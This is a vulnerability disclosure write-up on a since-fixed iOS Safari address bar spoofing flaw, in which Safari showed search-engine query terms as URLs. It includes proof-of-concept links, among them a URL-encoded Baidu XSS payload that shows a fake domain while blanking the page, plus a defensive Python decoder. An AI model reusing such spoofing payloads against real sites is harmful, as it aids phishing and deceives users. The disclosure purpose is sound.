Apple Safari Address Bar Spoofing Attacks with Search Engines on iOS

I reported the vulnerability to Apple on February 1, 2016. The vulnerabilities discussed in this article have been fixed. I think this is a very interesting logic bug, which makes the smart search bar dangerous!


AFFECTED PRODUCTS

——————–

User Agent:

Mozilla/5.0 (iPhone; CPU iPhone OS 9_3 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E5191d Safari/601.1

DESCRIPTION

——————–

In Safari for iOS, the address bar and the smart search bar are combined into a single field, and in Safari's settings the user can choose the default search engine: Yahoo, Google, Bing, Baidu, DuckDuckGo and so on. When a URL is searched for in the default search engine, that URL is displayed in the Omnibox. Because of this behaviour, if the search engine has an XSS, an attacker can place an arbitrary URL in the address bar and change the page's content, producing a spoofing attack.

PoC

——————–

Testing environment:

1. Set the default search engine to Baidu

2. iPhone/iPad

(1) Safari search on iPhone

POC:

<a href="https://www.baidu.com/s?tn=baidu&word=google.com">iphone</a>

[Screenshot: search_spoof_1]

(2) Safari search on iPad

POC:

<a href="https://www.baidu.com/s?tn=baidu&wd=google.com">IPad</a>

[Screenshot: search_spoof_2]


(3) Address bar spoofing attacks with search engines

If the search engine has an XSS, an attacker can place an arbitrary URL in the address bar and change the page's content, producing a spoofing attack. Here I found a Baidu search engine XSS to demonstrate the spoofing attack.

POC:

<a href="https://www.baidu.com/s?word=%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%73%70%6F%6F%66%2E%63%6F%6D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%22%3E%3C%62%6F%64%79%20%73%74%79%6C%65%3D%22%62%61%63%6B%67%72%6F%75%6E%64%3A%72%65%64%3B%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%22%3E%3C%2F%62%6F%64%79%3E&ms=1"><h1>iPhone-safari-spoof</h1></a>

[Screenshot: search_spoof_3]

Online DEMO: http://xisigr.com/test/spoof/safari/url20165055483693fb8543.html
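To see exactly what the Smart Search bar is handed by the PoC links above, here is an added Python example (not code from the original post): it decodes the search term from a Baidu-style search URL and flags the shape the XSS PoC relies on, a host-looking prefix, whitespace padding, then injected quote/tag characters. The parameter names word and wd come from the page's PoCs; the host regex and the verdict labels are my own heuristic.

```python
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# The two Baidu PoC links quoted on the page; Baidu takes the query as
# 'word' in the iPhone link and 'wd' in the iPad link.
POC_PLAIN = "https://www.baidu.com/s?tn=baidu&word=google.com"
POC_XSS = "https://www.baidu.com/s?word=%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%73%70%6F%6F%66%2E%63%6F%6D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%22%3E%3C%62%6F%64%79%20%73%74%79%6C%65%3D%22%62%61%63%6B%67%72%6F%75%6E%64%3A%72%65%64%3B%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%22%3E%3C%2F%62%6F%64%79%3E&ms=1"

SEARCH_PARAMS = ("word", "wd")  # Baidu's query parameter names, from the PoCs
# Heuristic of my own (assumption): a bare host, optionally with a path.
HOST_RE = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}(?:/\S*)?$", re.I)


def search_term(url: str) -> Optional[str]:
    """Return the decoded search term the bar would display, or None."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for name in SEARCH_PARAMS:
        if qs.get(name):
            return qs[name][0]
    return None


def classify_term(term: str) -> str:
    """'plain'            ordinary query text
    'url_like'         the whole term is a bare host, shown verbatim in the bar
    'url_like_markup'  host-looking prefix, whitespace padding, then quote/tag
                       characters: the shape of the page's XSS PoC"""
    parts = term.strip().split(None, 1)
    if not parts or not HOST_RE.match(parts[0]):
        return "plain"
    tail = parts[1] if len(parts) > 1 else ""
    if any(c in tail for c in "<>\"'"):
        return "url_like_markup"
    return "url_like"


def audit_search_url(url: str) -> dict:
    """Summarise what a search-engine URL would put into the address bar."""
    engine = urlsplit(url).hostname
    term = search_term(url)
    if term is None:
        return {"engine": engine, "term": None, "verdict": "no_term"}
    return {"engine": engine, "term": term.strip(), "verdict": classify_term(term)}


if __name__ == "__main__":
    for u in (POC_PLAIN, POC_XSS):
        print(audit_search_url(u))
```

Run against the XSS PoC, the decoded term starts with spoof.com, followed by padding and the injected body tag, which is why the bar could read as a plain domain while the page underneath was rewritten.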

FIXED

——————–

Finding an XSS in search engines such as Google, Yahoo or Bing is very hard, so Apple's fix is to add a search mark in the Smart Search bar.

[Screenshot: search_spoof_4]

CREDIT

——————–

This vulnerability was discovered by xisigr of Tencent's Xuanwu Lab (http://www.tencent.com).
